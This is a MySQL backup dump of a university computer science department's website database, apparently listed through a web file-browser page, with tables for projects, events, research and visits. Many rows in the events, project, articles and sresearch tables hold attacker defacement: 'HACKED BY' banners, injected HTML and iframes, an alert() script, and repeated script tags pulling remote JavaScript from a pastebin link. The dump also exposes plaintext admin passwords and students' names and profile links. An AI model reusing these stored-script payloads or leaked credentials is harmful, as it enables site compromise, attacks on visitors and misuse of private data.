0byt3m1n1
Path:
/
data
/
25
/
2
/
85
/
88
/
2411251
/
meta
/
2643847
/
mysql.backup
/
[
Home
]
File: cseit.mysqlcluster26.bak.sql
-- MySQL dump 10.13 Distrib 5.6.24, for Linux (x86_64) -- -- Host: mysqlcluster26 Database: cseit -- ------------------------------------------------------ -- Server version 5.6.46-86.2-56-log /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table `Department` -- DROP TABLE IF EXISTS `Department`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `Department` ( `DeptId` int(50) NOT NULL, `DeptName` varchar(50) NOT NULL, `DeptDesc` varchar(50) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `Department` -- LOCK TABLES `Department` WRITE; /*!40000 ALTER TABLE `Department` DISABLE KEYS */; INSERT INTO `Department` VALUES (1,'CSEIT','DESC'); /*!40000 ALTER TABLE `Department` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `Faculty` -- DROP TABLE IF EXISTS `Faculty`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `Faculty` ( `FacId` int(50) NOT NULL, `FacName` varchar(50) NOT NULL, `FacDesc` varchar(50) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `Faculty` -- LOCK TABLES `Faculty` WRITE; /*!40000 ALTER TABLE `Faculty` DISABLE KEYS */; INSERT INTO `Faculty` VALUES (111,'JBSGTOFDN','FGRBJYGX'); /*!40000 ALTER TABLE `Faculty` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `Student` -- DROP TABLE IF EXISTS `Student`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `Student` ( `StuId` int(50) NOT NULL, `StuName` varchar(50) NOT NULL, `StuDesc` varchar(50) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `Student` -- LOCK TABLES `Student` WRITE; /*!40000 ALTER TABLE `Student` DISABLE KEYS */; INSERT INTO `Student` VALUES (11,'ABC','KBVHJYUGFTRSWA'); /*!40000 ALTER TABLE `Student` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `admin` -- DROP TABLE IF EXISTS `admin`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `admin` ( `AdminName` varchar(25) NOT NULL, `AdminPass` varchar(25) NOT NULL, PRIMARY KEY (`AdminName`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `admin` -- LOCK TABLES `admin` WRITE; /*!40000 ALTER TABLE `admin` DISABLE KEYS */; INSERT INTO `admin` VALUES ('Abhi','1422025'); /*!40000 ALTER TABLE `admin` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `affiliations` -- DROP TABLE IF EXISTS `affiliations`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `affiliations` ( `ID` int(11) NOT NULL AUTO_INCREMENT, `Type` varchar(65) DEFAULT NULL, `Name` varchar(65) DEFAULT NULL, PRIMARY KEY (`ID`) ) ENGINE=InnoDB AUTO_INCREMENT=11 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `affiliations` -- LOCK TABLES `affiliations` WRITE; /*!40000 ALTER TABLE `affiliations` DISABLE KEYS */; INSERT INTO `affiliations` VALUES (1,'International','Google'),(2,'Department','DepOne'),(3,'Department','DepTwo'),(4,'International','Facebook'),(5,'Academic','Cisco'),(6,'Academic','SAP'),(7,'Academic','Oracle'),(8,'Academic','Android'),(9,'Academic','EMC2'),(10,'Academic','Certified Internet Webmaster'); /*!40000 ALTER TABLE `affiliations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `articles` -- DROP TABLE IF EXISTS `articles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `articles` ( `ArticleID` int(11) NOT NULL AUTO_INCREMENT, `ArticleName` varchar(100) NOT NULL, `Authors` varchar(100) NOT NULL, `Date` date NOT NULL, `Abstract` varchar(500) NOT NULL, PRIMARY KEY (`ArticleID`) ) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `articles` -- LOCK TABLES `articles` WRITE; /*!40000 ALTER TABLE `articles` DISABLE KEYS */; INSERT INTO `articles` VALUES (1,'Article 1','0','0000-00-00','blah blah blah'),(2,'Article 2','aevawef','2018-05-01','aevawev'),(3,'<html> <head> </head> <title>Hacked By HaYaL-ET-06=| TURKHACKTEAM.NET |=</title> <body \" bgcolor = \"','adsdas','2054-04-25','asdsads'),(4,'<html> <head> </head> <title>Hacked By HaYaL-ET-06=| TURKHACKTEAM.NET |=</title> <body \" bgcolor = \"','adsdas','2054-04-25','asdsads'),(5,'HACKED BY RAVAN','RAVAN','0000-00-00','<script type=\"text/javascript\" src=\"https://pastebin.com/raw/mGwtSCir\"></script>'); /*!40000 ALTER TABLE `articles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `common` -- DROP TABLE IF EXISTS `common`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `common` ( `member_id` int(10) NOT NULL, `thread_id` int(20) NOT NULL, `comment_order` int(40) NOT NULL, `text` varchar(600) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `common` -- LOCK TABLES `common` WRITE; /*!40000 ALTER TABLE `common` DISABLE KEYS */; /*!40000 ALTER TABLE `common` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `conference` -- DROP TABLE IF EXISTS `conference`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `conference` ( `ConferenceID` int(11) NOT NULL AUTO_INCREMENT, `ConfName` varchar(100) NOT NULL, `Members` int(100) NOT NULL, `Date` date NOT NULL, `Location` int(200) NOT NULL, `Abstract` int(200) NOT NULL, PRIMARY KEY (`ConferenceID`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `conference` -- LOCK TABLES `conference` WRITE; /*!40000 ALTER TABLE `conference` DISABLE KEYS */; INSERT INTO `conference` VALUES (1,'Conference 1',0,'0000-00-00',0,0),(2,'Conference 2',0,'2018-05-01',0,0); /*!40000 ALTER TABLE `conference` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `events` -- DROP TABLE IF EXISTS `events`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `events` ( `EventID` int(11) NOT NULL AUTO_INCREMENT, `Name` varchar(100) NOT NULL, `Date` date NOT NULL, `Time` varchar(100) NOT NULL, `Venue` varchar(100) NOT NULL, `Description` varchar(255) NOT NULL, `RegisterURL` varchar(255) NOT NULL, `GmapURL` varchar(255) NOT NULL, `FbURL` varchar(255) NOT NULL, `TwitterURL` varchar(255) NOT NULL, `LinURL` varchar(255) NOT NULL, `GplusURL` varchar(255) NOT NULL, PRIMARY KEY (`EventID`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `events` -- LOCK TABLES `events` WRITE; /*!40000 ALTER TABLE `events` DISABLE KEYS */; INSERT INTO `events` VALUES (1,'Knowatech','2018-05-18','','Mahe','','','','','','',''),(2,'HACKED BY NYLUS - THT - ZORROKÄ°N','0000-00-00','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N'),(3,'HACKED BY NYLUS - THT - ZORROKÄ°N','2018-07-02','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N'),(4,'HACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°N','0000-00-00','HACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°N','<html> <head> </head> <title>Hacked By HaYaL-ET-06=| TURKHACKTEAM.NET |=</title> <body \" bgcolor = \"black\"> <h4><center><font face = \"Agency Fb\" color = \"white\">HackeD By HaYaL-ET-06 </font></center><h4> <h3><center><font face = \"Agency Fb\" color = \"red\">','HACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°NHACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N'),(5,'YOUNES THE ALGERIAN HACKED THIS WEBSITE','2018-08-24','','','<script>alert(\"YOUNES THE ALGERIAN HACKED THIS WEBSITE\")</script>','','','','','',''),(6,'HACKED BY RAVAN','2018-08-31','11','','<script type=\"text/javascript\" src=\"https://pastebin.com/raw/mGwtSCir\"></script>','<script type=\"text/javascript\" src=\"https://pastebin.com/raw/mGwtSCir\"></script><script type=\"text/javascript\" src=\"https://pastebin.com/raw/mGwtSCir\"></script>','<script type=\"text/javascript\" src=\"https://pastebin.com/raw/mGwtSCir\"></script>','<script type=\"text/javascript\" src=\"https://pastebin.com/raw/mGwtSCir\"></script>','<script type=\"text/javascript\" src=\"https://pastebin.com/raw/mGwtSCir\"></script>','<script type=\"text/javascript\" src=\"https://pastebin.com/raw/mGwtSCir\"></script>','<script type=\"text/javascript\" src=\"https://pastebin.com/raw/mGwtSCir\"></script>'); /*!40000 ALTER TABLE `events` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fresearch` -- DROP TABLE IF EXISTS `fresearch`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `fresearch` ( `FRID` int(5) NOT NULL, `FRName` varchar(250) NOT NULL, `Authors` varchar(300) NOT NULL, `Date` date NOT NULL, `Status` varchar(10) NOT NULL, `Abstract` varchar(500) NOT NULL, PRIMARY KEY (`FRID`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `fresearch` -- LOCK TABLES `fresearch` WRITE; /*!40000 ALTER TABLE `fresearch` DISABLE KEYS */; INSERT INTO `fresearch` VALUES (0,'Faculty Research 1','aeawef','2018-05-31','ongoing','afweawf'),(1,'Faculty Research 2','Sukhwant Kaur','0000-00-00','complete','Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto Cyrpto '); /*!40000 ALTER TABLE `fresearch` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `journal` -- DROP TABLE IF EXISTS `journal`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `journal` ( `JournalID` int(5) NOT NULL AUTO_INCREMENT, `JournalName` varchar(100) NOT NULL, `Authors` int(100) NOT NULL, `Date` date NOT NULL, `Status` varchar(5) NOT NULL, `Abstract` int(200) NOT NULL, PRIMARY KEY (`JournalID`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `journal` -- LOCK TABLES `journal` WRITE; /*!40000 ALTER TABLE `journal` DISABLE KEYS */; INSERT INTO `journal` VALUES (1,'Journal 1',0,'2018-05-03','ongoi',0); /*!40000 ALTER TABLE `journal` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `members` -- DROP TABLE IF EXISTS `members`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `members` ( `memberid` int(10) NOT NULL, `program` varchar(30) NOT NULL, `fullname` varchar(30) NOT NULL, `siteaddress` varchar(300) NOT NULL, `profile` varchar(1000) NOT NULL, PRIMARY KEY (`memberid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `members` -- LOCK TABLES `members` WRITE; /*!40000 ALTER TABLE `members` DISABLE KEYS */; INSERT INTO `members` VALUES (1422025,'Btech CSE','Abhijith Kundar','https://www.linkedin.com/in/abhijith-kundar/','Currently pursuing Computer Science at Manipal Academy of Higher Education'),(1422037,'Btech CSE','Saurav Koli','https://www.linkedin.com/in/saurav-koli-b9105142/','Also pursuing Computer Science at Manipal Academy of Higher Education'); /*!40000 ALTER TABLE `members` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `project` -- DROP TABLE IF EXISTS `project`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `project` ( `ProjectID` int(11) NOT NULL AUTO_INCREMENT, `ProjectName` varchar(250) NOT NULL, `Incharge` varchar(50) NOT NULL, `Members` varchar(300) NOT NULL, `Status` varchar(10) NOT NULL, `Abstract` varchar(500) NOT NULL, PRIMARY KEY (`ProjectID`) ) ENGINE=InnoDB AUTO_INCREMENT=21 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `project` -- LOCK TABLES `project` WRITE; /*!40000 ALTER TABLE `project` DISABLE KEYS */; INSERT INTO `project` VALUES (1,'Project 1','ghccgh','vfghcfh','Ongoing','ygffcd'),(2,'Project 2','sdxfcvgm ,','sdfcghbjnmdfcgv','',''),(3,'Project 3','fghjbk','fghjbmk','ongoing','yghjkml,'),(7,'swetrdfgvbnhjmk','hf','hffhf','ongoing','hrg'),(8,'HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','HACKED BY NYLUS - THT - ZORROKÄ°N','completed','HACKED BY NYLUS - THT - ZORROKÄ°N'),(9,'<b>HACKED BY NYLUS - THT - ZORROKÄ°N</b>','<b>HACKED BY NYLUS - THT - ZORROKÄ°N</b>','<b>HACKED BY NYLUS - THT - ZORROKÄ°N</b>','ongoing','HACKED BY NYLUS - THT - ZORROKÄ°N<b>HACKED BY NYLUS - THT - ZORROKÄ°N</b>'),(10,'<html> <head> </head> <title>Hacked By HaYaL-ET-06=| TURKHACKTEAM.NET |=</title> <body \" bgcolor = \"black\"> <h4><center><font face = \"Agency Fb\" color = \"white\">HackeD By HaYaL-ET-06 </font></center><h4> <h3><center><font face = \"Agency Fb\" color = \"','','','',''),(11,'<marquee behavior=alternate><b>font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b></marquee>','<b>font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N','<b>font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b>','ongoing','<b>font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b>'),(12,'<marquee behavior=alternate><b><font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b></marquee>','','','',''),(13,'<font size=\"15\"><marquee behavior=alternate><b><font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b></marquee></font>','','','',''),(14,'<font size=\"15\"><marquee behavior=alternate><b><font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b></marquee></font>','<font size=\"15\"><marquee behavior=alternate><b><fo','<font size=\"15\"><marquee behavior=alternate><b><font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b></marquee></font>','ongoing','<font size=\"15\"><marquee behavior=alternate><b><font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b></marquee></font>'),(15,'<font size=\"30\"><marquee behavior=alternate><b><font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b></marquee></font>','<iframe width=\"420\" height=\"315\" src=\"https://www.','<b>HACKED BY NYLUS - THT - ZORROKÄ°N</b>','ongoing','<b>HACKED BY NYLUS - THT - ZORROKÄ°N</b>'),(16,'<iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/watch?v=XBhwu2AgqZ8?rel=0&autoplay=1\" frameborder=\"0\" allowfullscreen></iframe><font size=\"30\"><marquee behavior=alternate><b><font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b','<font size=\"30\"><marquee behavior=alternate><b><fo','<font size=\"30\"><marquee behavior=alternate><b><font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b></marquee></font>','','<font size=\"30\"><marquee behavior=alternate><b><font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b></marquee></font>'),(17,'<font size=\"30\"><marquee behavior=alternate><b><font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N</font></b></marquee></font>','<font size=\"15\"><marquee behavior=alternate><b><fo','https://www.youtube.com/watch?v=XBhwu2AgqZ8','','https://www.youtube.com/watch?v=XBhwu2AgqZ8'),(18,'<font size=\"50\"><marquee behavior=alternate><b><font color=\"red\">HACKED BY NYLUS -THT-ZORROKÄ°N </font></b></marquee></font>','<iframe width=\"420\" height=\"315\" src=\"https://www.','<iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/watch?v=XBhwu2AgqZ8?rel=0&autoplay=1\" frameborder=\"0\" allowfullscreen></iframe>','','<iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/watch?v=XBhwu2AgqZ8?rel=0&autoplay=1\" frameborder=\"0\" allowfullscreen></iframe>'),(19,'sadsad','dsadsad','sadadad','ongoing','adada'),(20,'<font size=\"30\">HACKED BY NYLUS-ZORROKIN-THT</font>','<font size=\"30\">HACKED BY NYLUS-ZORROKIN-THT</font','<font size=\"30\">HACKED BY NYLUS-ZORROKIN-THT</font>','ongoing','<font size=\"30\">HACKED BY NYLUS-ZORROKIN-THT</font>'); /*!40000 ALTER TABLE `project` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `sresearch` -- DROP TABLE IF EXISTS `sresearch`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `sresearch` ( `SRID` int(5) NOT NULL AUTO_INCREMENT, `SRName` varchar(250) NOT NULL, `Incharge` varchar(50) NOT NULL, `Authors` varchar(300) NOT NULL, `Status` varchar(10) NOT NULL, `Abstract` varchar(500) NOT NULL, PRIMARY KEY (`SRID`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `sresearch` -- LOCK TABLES `sresearch` WRITE; /*!40000 ALTER TABLE `sresearch` DISABLE KEYS */; INSERT INTO `sresearch` VALUES (1,'Student Research 1','awefawgawg','aewgawge','ongoing','gawegawg'),(2,'sadsa','sdasdas','asdasd','ongoing','asd'),(3,'HACKED BY RAVAN','<script type=\"text/javascript\" src=\"https://pasteb','<script type=\"text/javascript\" src=\"https://pastebin.com/raw/mGwtSCir\"></script>','','<script type=\"text/javascript\" src=\"https://pastebin.com/raw/mGwtSCir\"></script>'); /*!40000 ALTER TABLE `sresearch` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `technology` -- DROP TABLE IF EXISTS `technology`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `technology` ( `TechnoID` int(11) NOT NULL AUTO_INCREMENT, `TechnoName` varchar(100) DEFAULT NULL, PRIMARY KEY (`TechnoID`) ) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `technology` -- LOCK TABLES `technology` WRITE; /*!40000 ALTER TABLE `technology` DISABLE KEYS */; INSERT INTO `technology` VALUES (1,'Programming'),(2,'Machine Learning'),(3,'Blockchain'),(4,'E-Commerce'),(5,'Enterprise Systems'),(6,'Web Development'),(7,'Intelligent Systems'),(8,'Virtual Reality'),(9,'Cybersecurity'),(10,'Sensors'),(11,'Data Science'),(12,'Cloud Computing'); /*!40000 ALTER TABLE `technology` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `users` -- DROP TABLE IF EXISTS `users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `users` ( `user_id` varchar(50) NOT NULL, `user_password` varchar(50) NOT NULL, `user_type` varchar(50) NOT NULL, PRIMARY KEY (`user_id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `users` -- LOCK TABLES `users` WRITE; /*!40000 ALTER TABLE `users` DISABLE KEYS */; INSERT INTO `users` VALUES ('admin1','Hyderabad','Admin'); /*!40000 ALTER TABLE `users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `visits` -- DROP TABLE IF EXISTS `visits`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `visits` ( `TripID` int(11) NOT NULL AUTO_INCREMENT, `TripName` varchar(255) NOT NULL, `VDate` date NOT NULL, `VDescription` varchar(255) NOT NULL, `VType` varchar(15) NOT NULL, PRIMARY KEY (`TripID`) ) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `visits` -- LOCK TABLES `visits` WRITE; /*!40000 ALTER TABLE `visits` DISABLE KEYS */; INSERT INTO `visits` VALUES (1,'Visit to Cisco 2014','0000-00-00','Trip to Cisco','Regional'),(2,'Visit to Cisco 2015','0000-00-00','Trip to Cisco','Regional'),(3,'Visit to Cisco 2016','0000-00-00','Trip to Cisco','Regional'),(4,'Manipal Trip 2016','2018-05-03','Trip to Manipal','International'),(5,'Malaysia Trip 2017','2017-09-12','Trip to Malaysia','International'),(6,'Germany Trip 2018','2018-02-07','Trip to Germany','International'),(7,'bicoura','0000-00-00','walou','Regional'),(8,'aRiza','2018-06-27','aRiza','Regional'),(9,'aRiza','2018-06-27','aRiza','International'),(10,'OMAR','2018-08-30','OMAR','International'),(11,'sadadadad','2019-01-25','adadadadada','Regional'); /*!40000 ALTER TABLE `visits` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping routines for database 'cseit' -- /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2020-02-09 5:30:04